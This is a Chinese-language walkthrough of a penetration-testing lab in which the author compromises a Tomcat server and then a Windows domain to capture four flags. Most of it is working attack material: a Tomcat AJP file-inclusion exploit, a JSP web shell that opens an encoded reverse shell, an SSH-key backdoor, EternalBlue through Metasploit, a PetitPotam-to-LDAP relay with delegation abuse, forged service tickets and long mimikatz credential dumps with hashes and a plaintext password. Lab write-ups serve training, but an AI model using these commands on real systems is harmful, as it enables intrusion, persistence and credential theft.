flag01
fscan扫一下
进入http://39.xx.xx.xx:8080后台管理网站看看
dirsearch -u "http://39.xx.xx.xx:8080/"
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/jugg/.dirsearch/reports/39.98.120.30-8080/-_23-10-15_22-30-22.txt
Error Log: /home/jugg/.dirsearch/logs/errors-23-10-15_22-30-22.log
Target: http://39.98.120.30:8080/
[22:30:22] Starting:
[22:30:23] 302 - 0B - /js -> /js/
[22:30:29] 200 - 114B - /404.html
[22:30:36] 400 - 795B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[22:30:37] 400 - 795B - /a%5c.aspx
[22:30:56] 302 - 0B - /css -> /css/
[22:30:56] 302 - 0B - /data -> /data/
[22:30:58] 302 - 0B - /docs -> /docs/
[22:30:58] 200 - 17KB - /docs/
[22:30:58] 302 - 0B - /download -> /download/
[22:30:58] 200 - 132B - /download/
[22:31:00] 200 - 946B - /examples/servlets/servlet/RequestHeaderExample
[22:31:00] 200 - 1KB - /examples/
[22:31:00] 200 - 658B - /examples/servlets/servlet/CookieExample
[22:31:00] 302 - 0B - /examples -> /examples/
[22:31:00] 200 - 6KB - /examples/servlets/index.html
[22:31:00] 200 - 679B - /examples/jsp/snp/snoop.jsp
[22:31:02] 403 - 3KB - /host-manager/html
[22:31:02] 403 - 3KB - /host-manager/
[22:31:04] 200 - 7KB - /index.html
[22:31:06] 302 - 0B - /lib -> /lib/
[22:31:09] 302 - 0B - /manager -> /manager/
[22:31:09] 302 - 0B - /images -> /images/
[22:31:09] 403 - 3KB - /manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY
[22:31:09] 403 - 3KB - /manager/jmxproxy
[22:31:09] 403 - 3KB - /manager/
[22:31:09] 403 - 3KB - /manager/jmxproxy/?qry=STUFF
[22:31:09] 403 - 3KB - /manager/html/
[22:31:09] 403 - 3KB - /manager/admin.asp
[22:31:09] 403 - 3KB - /manager/VERSION
[22:31:09] 403 - 3KB - /manager/login
[22:31:09] 403 - 3KB - /manager/login.asp
[22:31:09] 403 - 3KB - /manager/html
[22:31:09] 403 - 3KB - /manager/status/all
[22:31:09] 403 - 3KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage
[22:31:09] 403 - 3KB - /manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE
[22:31:09] 403 - 3KB - /manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERS
[22:31:09] 403 - 3KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage&key=used
[22:31:09] 403 - 3KB - /manager/jmxproxy/?set=Catalina%3Atype%3DValve%2Cname%3DErrorReportValve%2Chost%3Dlocalhost&att=debug&val=cow
[22:31:09] 403 - 3KB - /manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
[22:31:29] 403 - 0B - /upload
[22:31:29] 403 - 0B - /upload/1.php
[22:31:29] 403 - 0B - /upload/loginIxje.php
[22:31:29] 403 - 0B - /upload/b_user.xls
[22:31:29] 403 - 0B - /upload/
[22:31:29] 403 - 0B - /upload/test.txt
[22:31:29] 403 - 0B - /upload/b_user.csv
[22:31:29] 403 - 0B - /upload/2.php
[22:31:29] 403 - 0B - /upload/test.php
[22:31:29] 403 - 0B - /upload/upload.php
[22:31:29] 200 - 9KB - /user.html
Task Completed
查看/docs/
发现是 Apache Tomcat Version 9.0.30, Dec 7 2019,可以 CVE-2020-1938 AJP 文件包含
python3 ajpShooter.py http://39.xx.xx.xx:8080 8009 /WEB-INF/web.xml read
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd" >
<web-app>
<display-name>Archetype Created Web Application</display-name>
<security-constraint>
<display-name>Tomcat Server Configuration Security Constraint</display-name>
<web-resource-collection>
<web-resource-name>Protected Area</web-resource-name>
<url-pattern>/upload/*</url-pattern>
</web-resource-collection>
<auth-constraint>
<role-name>admin</role-name>
</auth-constraint>
</security-constraint>
<error-page>
<error-code>404</error-code>
<location>/404.html</location>
</error-page>
<error-page>
<error-code>403</error-code>
<location>/error.html</location>
</error-page>
<error-page>
<exception-type>java.lang.Throwable</exception-type>
<location>/error.html</location>
</error-page>
<servlet>
<servlet-name>HelloServlet</servlet-name>
<servlet-class>com.example.HelloServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>HelloServlet</servlet-name>
<url-pattern>/HelloServlet</url-pattern>
</servlet-mapping>
<servlet>
<display-name>LoginServlet</display-name>
<servlet-name>LoginServlet</servlet-name>
<servlet-class>com.example.LoginServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>LoginServlet</servlet-name>
<url-pattern>/LoginServlet</url-pattern>
</servlet-mapping>
<servlet>
<display-name>RegisterServlet</display-name>
<servlet-name>RegisterServlet</servlet-name>
<servlet-class>com.example.RegisterServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>RegisterServlet</servlet-name>
<url-pattern>/RegisterServlet</url-pattern>
</servlet-mapping>
<servlet>
<display-name>UploadTestServlet</display-name>
<servlet-name>UploadTestServlet</servlet-name>
<servlet-class>com.example.UploadTestServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>UploadTestServlet</servlet-name>
<url-pattern>/UploadServlet</url-pattern>
</servlet-mapping>
<servlet>
<display-name>DownloadFileServlet</display-name>
<servlet-name>DownloadFileServlet</servlet-name>
<servlet-class>com.example.DownloadFileServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>DownloadFileServlet</servlet-name>
<url-pattern>/DownloadServlet</url-pattern>
</servlet-mapping>
</web-app>
看到有一个UploadServlet功能能上传文件,所以可以包含文件rce
http://39.xx.xx.xx:8080/UploadServlet
上传文本test.txt:
<%
java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC92cHMvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
%>
弹窗
返回路径
/upload/10bfc39ad946d9d279328bff761215d4/20231015103624856.txt
运行
python3 ajpShooter.py http://39.xx.xx.xx:8080/ 8009 /upload/10bfc39ad946d9d279328bff761215d4/20231015103624856.txt eval
拿到shell,获得flag01
这里需要留个后门
kali:
ssh-keygen -t rsa -b 4096
cat ~/.ssh/id_rsa.pub
靶机:
echo "~/.ssh/id_rsa.pub的内容" > /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
kali:
ssh -i ~/.ssh/id_rsa root@39.xx.xx.xx
flag02
上传fscan和frp,挂代理
nohup ./frpc -c frpc.ini &
收集信息
(icmp) Target 172.22.11.6 is alive
(icmp) Target 172.22.11.76 is alive
(icmp) Target 172.22.11.26 is alive
(icmp) Target 172.22.11.45 is alive
[*] Icmp alive hosts len is: 4
172.22.11.26:445 open
172.22.11.6:88 open
172.22.11.6:445 open
172.22.11.76:8080 open
172.22.11.45:139 open
172.22.11.26:139 open
172.22.11.6:139 open
172.22.11.45:135 open
172.22.11.26:135 open
172.22.11.76:22 open
172.22.11.6:135 open
172.22.11.45:445 open
172.22.11.76:8009 open
[*] alive ports len is: 13
start vulscan
[+] 172.22.11.45 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetInfo:
[*]172.22.11.6
[->]XIAORANG-DC
[->]172.22.11.6
[*] NetBios: 172.22.11.26 XIAORANG\XR-LCM3AE8B
[*] WebTitle: http://172.22.11.76:8080 code:200 len:7091 title:后台管理
[*] NetInfo:
[*]172.22.11.26
[->]XR-LCM3AE8B
[->]172.22.11.26
[*] NetBios: 172.22.11.6 [+]DC XIAORANG\XIAORANG-DC
[*] NetBios: 172.22.11.45 XR-DESKTOP.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
得到下面的拓扑
172.22.11.6 XIAORANG-DC DC域
172.22.11.26 XR-LCM3AE8B
172.22.11.76 本机
172.22.11.45 MS17-010 XR-DESKTOP
先打172.22.11.45永恒之蓝
msfconsole
setg proxies socks5:152.136.165.68:5001
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set RHOSTS 172.22.11.45
exploit
get shell,获得flag02
shell
flag03
信息收集
meterpreter > load kiwi
meterpreter > hashdump
meterpreter > creds_all
得到一些凭据
Administrator 48f6da83eb89a4da8a1cc963b855a799 – (本地凭据)
XR-DESKTOP$ 982c2343ba3b998cfe130e9fd919d100 – (域凭据)
yangmei 25e42ef4cc0ab6a8ff9e3edbbda91841 – xrihGHgoNZQ (明文) – (域凭据)
横向传递到管理员终端
proxychains impacket-wmiexec -hashes 00000000000000000000000000000000:48f6da83eb89a4da8a1cc963b855a799 Administrator@172.22.11.45
使用bloodhound.py得到压缩包
proxychains4 python3 bloodhound.py -u yangmei -p xrihGHgoNZQ -d xiaorang.lab --dns-tcp -ns 172.22.11.6 -c all --zip
用bloodhound分析
看大佬的分析春秋云镜-【仿真场景】Spoofing writeup - 渗透测试中心 - 博客园 (cnblogs.com)
使用Bloodhound收集到的用户名组合获取到的密码/hashes组合爆破,没发现其他新用户
MAQ = 0,加不了计算机
当前LDAP 没 TLS,远程也加不了计算机,impacket的addcomputer有两种方法samr和ldaps。samr受到MAQ = 0的限制,无法添加计算机;ldaps受到 没TLS + MAQ = 0 的限制
域控存在nopac,当前用户yangmei使用nopac没打死,并且对域内computer container没有createchild的ACL
域控存在nopac,当前用户yangmei对当前windows机器xr-desktop没WriteDacl权限,意味着无法修改SamAccountName
域内存在 DFscoerce 和 petitpotam,但是不存在CVE-2019-1040,因此放弃 DFscoerce,优先使用petitpotam
NoPac exploit: Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user (github.com)
petitpotam扫描
proxychains crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M petitpotam
无ADCS + Petitpotam + ntlm中继打法
攻击链:用petitpotam触发存在漏洞且开启了webclient服务的目标,利用petitpotam触发目标访问我们的http中继服务,目标将会使用webclient携带ntlm认证访问我们的中继,并且将其认证中继到ldap,获取到机器账户的身份,以机器账户的身份修改其自身的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性,允许我们的恶意机器账户模拟以及认证访问到目标机器 (RBCD)
满足条件,目标机器需要开启webclient服务
WebClient扫描,确定只能拿下 172.22.11.26 (XR-LCM3AE8B)
proxychains crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M webdav
中继攻击前言:
实战中的中继打法只需要停掉80占用服务,开启端口转发(portfwd,CS在后续版本中添加了rportfwd_local,直接转发到客户端本地)
本次演示类似实战的打法,不选择把impacket丢到入口ubuntu上面这种操作
中继攻击环境配置:端口转发 + 代理
我们目前需要把服务器的80,转发到客户端本地的80
注意:由于SSH的反向端口转发监听的时候只会监听127.0.0.1,所以这时候需要点技巧
如图所示,即使反向端口转发79端口指定监听全部 (-R \*:79:127.0.0.1:80),端口79依旧绑定在了127.0.0.1
ssh -i id_rsa root@39.xx.xx.xx -D vps_ip:5001 -R \*:79:127.0.0.1:80
加多一条socat,让流量 0.0.0.0:80 转发到 127.0.0.1:79,再反向转发回客户端本地的80 ,变相使80监听在0.0.0.0
nohup socat TCP-LISTEN:80,fork,bind=0.0.0.0 TCP:localhost:79 &
测试,从172.22.11.76:80 进来的流量直接转发到了我们本地
nc -lvvp 80
proxychains curl http://172.22.11.76:80
本地开启ntlmrelayx
注意:
前面提到,没有ldaps,所以不能使用addcomputer
同时在使用proxychains后,ldap://后面只能接DC域的ip
利用前面拿下的XR-Desktop作为恶意机器账户设置RBCD
proxychains python ntlmrelayx.py -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access
使用Petitpotam触发 XR-LCM3AE8B 认证到172.22.11.76 (ubuntu)
proxychains python3 PetitPotam.py -u yangmei -p 'xrihGHgoNZQ' -d xiaorang.lab ubuntu@80/pwn.txt 172.22.11.26
可以看到,已经完成RBCD攻击了,接下来就是直接申请XR-LCM3AE8B的银票了
申请XR-LCM3AE8B CIFS票据。这里的hash是前面抓到的XR-DESKTOP用户的hash
proxychains impacket-getST -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate administrator -hashes :982c2343ba3b998cfe130e9fd919d100 xiaorang.lab/XR-Desktop\$ -dc-ip 172.22.11.6
然后本地会保存一个administrator.ccache的票据,绑定一下
export KRB5CCNAME=administrator.ccache
把XR-LCM3AE8B.xiaorang.lab的ip加到hosts里(172.22.11.26)
sudo vim /etc/hosts
然后就是利用这个银票,进行psexec无密码连接
proxychains impacket-psexec xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26 -codec gbk
获得flag03
type C:\users\administrator\flag\flag03.txt
flag04
添加管理员账号,远程连接172.22.11.26
net user test Abcd1234 /add
net localgroup administrators test /add
上传mimikatz抓密码(管理员运行)
mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit
.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # log
Using 'mimikatz.log' for logfile : OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 5430501 (00000000:0052dce5)
Session : RemoteInteractive from 3
User Name : test
Domain : XR-LCM3AE8B
Logon Server : XR-LCM3AE8B
Logon Time : 2023/10/16 16:59:13
SID : S-1-5-21-886837244-2534789743-3500935927-1002
msv :
[00000003] Primary
* Username : test
* Domain : XR-LCM3AE8B
* NTLM : c780c78872a102256e946b3ad238f661
* SHA1 : bc4e7d2a003b79bb6ffdfff949108220c1fad373
tspkg :
wdigest :
* Username : test
* Domain : XR-LCM3AE8B
* Password : (null)
kerberos :
* Username : test
* Domain : XR-LCM3AE8B
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 5430469 (00000000:0052dcc5)
Session : RemoteInteractive from 3
User Name : test
Domain : XR-LCM3AE8B
Logon Server : XR-LCM3AE8B
Logon Time : 2023/10/16 16:59:13
SID : S-1-5-21-886837244-2534789743-3500935927-1002
msv :
[00000003] Primary
* Username : test
* Domain : XR-LCM3AE8B
* NTLM : c780c78872a102256e946b3ad238f661
* SHA1 : bc4e7d2a003b79bb6ffdfff949108220c1fad373
tspkg :
wdigest :
* Username : test
* Domain : XR-LCM3AE8B
* Password : (null)
kerberos :
* Username : test
* Domain : XR-LCM3AE8B
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 5417102 (00000000:0052a88e)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/16 16:59:12
SID : S-1-5-90-0-3
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : fa95d924926bcc02e177c18dedc74a7c
* SHA1 : 7e4833422cb782156d6608aebf8250620586de5f
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-LCM3AE8B$
* Domain : xiaorang.lab
* Password : 5a e7 dd 03 c0 47 d2 72 8e bb 0d ea bc ae 87 b6 cf 23 1a 2c 3b 37 31 7f 36 2e 58 4a f5 12 d2 13 b6 9f 3c 3f c8 ef 5c 9e 4a 7a 43 9c ba 5a 72 9b 8b a1 21 57 b4 96 48 b1 ed 55 bc 9a 49 42 35 c6 96 83 fa 57 73 a5 dc fc e4 54 7c 0b 27 21 05 7a 41 6a 77 7b aa 5c 22 50 66 12 70 20 51 a5 5c 7e 77 e8 11 26 d0 62 51 d9 98 2f 43 83 c2 ca ba 1b 69 52 98 34 fb 3b ae 71 1f 45 b2 1a eb 61 a6 21 2f dc 8c 00 63 7d 0a d2 d9 01 aa 2e 19 82 76 29 94 36 61 88 54 9c 28 f8 2d c1 74 1d a9 cb 7f 30 0c a0 28 8e 80 98 a1 ae 70 a8 9b 0a 42 62 92 29 51 b2 94 92 ee 09 d5 d6 dc de b1 66 4b b1 25 04 01 d0 d4 5c 65 cb 24 8e 46 70 0d 39 08 c6 fa ba e8 b5 41 7c 57 0c b6 d5 55 e6 e6 b9 80 a6 b9 73 9f af 96 5a 4a 12 72 de d7 71 3b fe 83 eb b2 fc
ssp :
credman :
Authentication Id : 0 ; 5415775 (00000000:0052a35f)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/16 16:59:12
SID : S-1-5-90-0-3
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : fa95d924926bcc02e177c18dedc74a7c
* SHA1 : 7e4833422cb782156d6608aebf8250620586de5f
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-LCM3AE8B$
* Domain : xiaorang.lab
* Password : 5a e7 dd 03 c0 47 d2 72 8e bb 0d ea bc ae 87 b6 cf 23 1a 2c 3b 37 31 7f 36 2e 58 4a f5 12 d2 13 b6 9f 3c 3f c8 ef 5c 9e 4a 7a 43 9c ba 5a 72 9b 8b a1 21 57 b4 96 48 b1 ed 55 bc 9a 49 42 35 c6 96 83 fa 57 73 a5 dc fc e4 54 7c 0b 27 21 05 7a 41 6a 77 7b aa 5c 22 50 66 12 70 20 51 a5 5c 7e 77 e8 11 26 d0 62 51 d9 98 2f 43 83 c2 ca ba 1b 69 52 98 34 fb 3b ae 71 1f 45 b2 1a eb 61 a6 21 2f dc 8c 00 63 7d 0a d2 d9 01 aa 2e 19 82 76 29 94 36 61 88 54 9c 28 f8 2d c1 74 1d a9 cb 7f 30 0c a0 28 8e 80 98 a1 ae 70 a8 9b 0a 42 62 92 29 51 b2 94 92 ee 09 d5 d6 dc de b1 66 4b b1 25 04 01 d0 d4 5c 65 cb 24 8e 46 70 0d 39 08 c6 fa ba e8 b5 41 7c 57 0c b6 d5 55 e6 e6 b9 80 a6 b9 73 9f af 96 5a 4a 12 72 de d7 71 3b fe 83 eb b2 fc
ssp :
credman :
Authentication Id : 0 ; 5414128 (00000000:00529cf0)
Session : Interactive from 3
User Name : UMFD-3
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2023/10/16 16:59:12
SID : S-1-5-96-0-3
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : fa95d924926bcc02e177c18dedc74a7c
* SHA1 : 7e4833422cb782156d6608aebf8250620586de5f
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-LCM3AE8B$
* Domain : xiaorang.lab
* Password : 5a e7 dd 03 c0 47 d2 72 8e bb 0d ea bc ae 87 b6 cf 23 1a 2c 3b 37 31 7f 36 2e 58 4a f5 12 d2 13 b6 9f 3c 3f c8 ef 5c 9e 4a 7a 43 9c ba 5a 72 9b 8b a1 21 57 b4 96 48 b1 ed 55 bc 9a 49 42 35 c6 96 83 fa 57 73 a5 dc fc e4 54 7c 0b 27 21 05 7a 41 6a 77 7b aa 5c 22 50 66 12 70 20 51 a5 5c 7e 77 e8 11 26 d0 62 51 d9 98 2f 43 83 c2 ca ba 1b 69 52 98 34 fb 3b ae 71 1f 45 b2 1a eb 61 a6 21 2f dc 8c 00 63 7d 0a d2 d9 01 aa 2e 19 82 76 29 94 36 61 88 54 9c 28 f8 2d c1 74 1d a9 cb 7f 30 0c a0 28 8e 80 98 a1 ae 70 a8 9b 0a 42 62 92 29 51 b2 94 92 ee 09 d5 d6 dc de b1 66 4b b1 25 04 01 d0 d4 5c 65 cb 24 8e 46 70 0d 39 08 c6 fa ba e8 b5 41 7c 57 0c b6 d5 55 e6 e6 b9 80 a6 b9 73 9f af 96 5a 4a 12 72 de d7 71 3b fe 83 eb b2 fc
ssp :
credman :
Authentication Id : 0 ; 839600 (00000000:000ccfb0)
Session : RemoteInteractive from 2
User Name : zhanghui
Domain : XIAORANG
Logon Server : XIAORANG-DC
Logon Time : 2023/10/16 16:28:47
SID : S-1-5-21-3598443049-773813974-2432140268-1133
msv :
[00000003] Primary
* Username : zhanghui
* Domain : XIAORANG
* NTLM : 1232126b24cdf8c9bd2f788a9d7c7ed1
* SHA1 : f3b66ff457185cdf5df6d0a085dd8935e226ba65
* DPAPI : 4bfe751ae03dc1517cfb688adc506154
tspkg :
wdigest :
* Username : zhanghui
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : zhanghui
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 804868 (00000000:000c4804)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/16 16:28:46
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : f87bbea221c346a6578b5e937f207038
* SHA1 : 318380b6fdd4556d540909a5c86a1bf191b2f0f5
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-LCM3AE8B$
* Domain : xiaorang.lab
* Password : 7e 84 db cc ca 73 03 80 f7 29 81 e8 9a fe 5f f1 22 35 25 bb 96 3a 28 f5 3e e9 e7 09 9f 36 a4 11 b1 77 de a6 77 48 92 8b 49 49 c2 e8 02 16 89 fb 33 bd b5 2a f7 04 62 74 db 1e c3 ba bd 63 f8 b0 d1 ec 46 50 4e 04 38 6d a7 a4 7e 0d 1a 4d 06 5a 73 6e 11 71 11 e2 7f 9b 8e 7f 68 6a 8f 23 6e 38 66 a5 76 95 65 1d 1a 38 24 fc 64 e2 ca 83 c4 87 57 ec 28 eb fe 15 50 c1 55 b2 22 46 1a 2d 7b 50 d0 71 b5 90 86 90 da 4b a8 51 2a 85 9b 38 e0 0f ea 2a 67 18 3c 8d f4 5e 3a 50 2b 57 b3 55 c5 b6 48 5a af 8c 3c f6 f4 09 0e f4 d9 ff f3 3d a2 f7 87 eb 33 02 d3 f9 d1 da b7 ac 37 14 0a 50 cc 3b ca d1 6f 0a c2 a0 73 81 75 65 91 85 95 dd 60 c6 a9 e1 1f 43 9c 4c 81 91 b5 77 ed 2d 28 5d c8 0f 1a 06 c8 89 44 64 65 11 f2 36 37 13 7c ef 8b 56
ssp :
credman :
Authentication Id : 0 ; 804835 (00000000:000c47e3)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/16 16:28:46
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : fa95d924926bcc02e177c18dedc74a7c
* SHA1 : 7e4833422cb782156d6608aebf8250620586de5f
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-LCM3AE8B$
* Domain : xiaorang.lab
* Password : 5a e7 dd 03 c0 47 d2 72 8e bb 0d ea bc ae 87 b6 cf 23 1a 2c 3b 37 31 7f 36 2e 58 4a f5 12 d2 13 b6 9f 3c 3f c8 ef 5c 9e 4a 7a 43 9c ba 5a 72 9b 8b a1 21 57 b4 96 48 b1 ed 55 bc 9a 49 42 35 c6 96 83 fa 57 73 a5 dc fc e4 54 7c 0b 27 21 05 7a 41 6a 77 7b aa 5c 22 50 66 12 70 20 51 a5 5c 7e 77 e8 11 26 d0 62 51 d9 98 2f 43 83 c2 ca ba 1b 69 52 98 34 fb 3b ae 71 1f 45 b2 1a eb 61 a6 21 2f dc 8c 00 63 7d 0a d2 d9 01 aa 2e 19 82 76 29 94 36 61 88 54 9c 28 f8 2d c1 74 1d a9 cb 7f 30 0c a0 28 8e 80 98 a1 ae 70 a8 9b 0a 42 62 92 29 51 b2 94 92 ee 09 d5 d6 dc de b1 66 4b b1 25 04 01 d0 d4 5c 65 cb 24 8e 46 70 0d 39 08 c6 fa ba e8 b5 41 7c 57 0c b6 d5 55 e6 e6 b9 80 a6 b9 73 9f af 96 5a 4a 12 72 de d7 71 3b fe 83 eb b2 fc
ssp :
credman :
Authentication Id : 0 ; 803812 (00000000:000c43e4)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2023/10/16 16:28:46
SID : S-1-5-96-0-2
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : fa95d924926bcc02e177c18dedc74a7c
* SHA1 : 7e4833422cb782156d6608aebf8250620586de5f
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-LCM3AE8B$
* Domain : xiaorang.lab
* Password : 5a e7 dd 03 c0 47 d2 72 8e bb 0d ea bc ae 87 b6 cf 23 1a 2c 3b 37 31 7f 36 2e 58 4a f5 12 d2 13 b6 9f 3c 3f c8 ef 5c 9e 4a 7a 43 9c ba 5a 72 9b 8b a1 21 57 b4 96 48 b1 ed 55 bc 9a 49 42 35 c6 96 83 fa 57 73 a5 dc fc e4 54 7c 0b 27 21 05 7a 41 6a 77 7b aa 5c 22 50 66 12 70 20 51 a5 5c 7e 77 e8 11 26 d0 62 51 d9 98 2f 43 83 c2 ca ba 1b 69 52 98 34 fb 3b ae 71 1f 45 b2 1a eb 61 a6 21 2f dc 8c 00 63 7d 0a d2 d9 01 aa 2e 19 82 76 29 94 36 61 88 54 9c 28 f8 2d c1 74 1d a9 cb 7f 30 0c a0 28 8e 80 98 a1 ae 70 a8 9b 0a 42 62 92 29 51 b2 94 92 ee 09 d5 d6 dc de b1 66 4b b1 25 04 01 d0 d4 5c 65 cb 24 8e 46 70 0d 39 08 c6 fa ba e8 b5 41 7c 57 0c b6 d5 55 e6 e6 b9 80 a6 b9 73 9f af 96 5a 4a 12 72 de d7 71 3b fe 83 eb b2 fc
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/10/16 16:25:20
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 59607 (00000000:0000e8d7)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/16 16:25:20
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : f87bbea221c346a6578b5e937f207038
* SHA1 : 318380b6fdd4556d540909a5c86a1bf191b2f0f5
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-LCM3AE8B$
* Domain : xiaorang.lab
* Password : 7e 84 db cc ca 73 03 80 f7 29 81 e8 9a fe 5f f1 22 35 25 bb 96 3a 28 f5 3e e9 e7 09 9f 36 a4 11 b1 77 de a6 77 48 92 8b 49 49 c2 e8 02 16 89 fb 33 bd b5 2a f7 04 62 74 db 1e c3 ba bd 63 f8 b0 d1 ec 46 50 4e 04 38 6d a7 a4 7e 0d 1a 4d 06 5a 73 6e 11 71 11 e2 7f 9b 8e 7f 68 6a 8f 23 6e 38 66 a5 76 95 65 1d 1a 38 24 fc 64 e2 ca 83 c4 87 57 ec 28 eb fe 15 50 c1 55 b2 22 46 1a 2d 7b 50 d0 71 b5 90 86 90 da 4b a8 51 2a 85 9b 38 e0 0f ea 2a 67 18 3c 8d f4 5e 3a 50 2b 57 b3 55 c5 b6 48 5a af 8c 3c f6 f4 09 0e f4 d9 ff f3 3d a2 f7 87 eb 33 02 d3 f9 d1 da b7 ac 37 14 0a 50 cc 3b ca d1 6f 0a c2 a0 73 81 75 65 91 85 95 dd 60 c6 a9 e1 1f 43 9c 4c 81 91 b5 77 ed 2d 28 5d c8 0f 1a 06 c8 89 44 64 65 11 f2 36 37 13 7c ef 8b 56
ssp :
credman :
Authentication Id : 0 ; 59566 (00000000:0000e8ae)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/10/16 16:25:20
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : fa95d924926bcc02e177c18dedc74a7c
* SHA1 : 7e4833422cb782156d6608aebf8250620586de5f
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-LCM3AE8B$
* Domain : xiaorang.lab
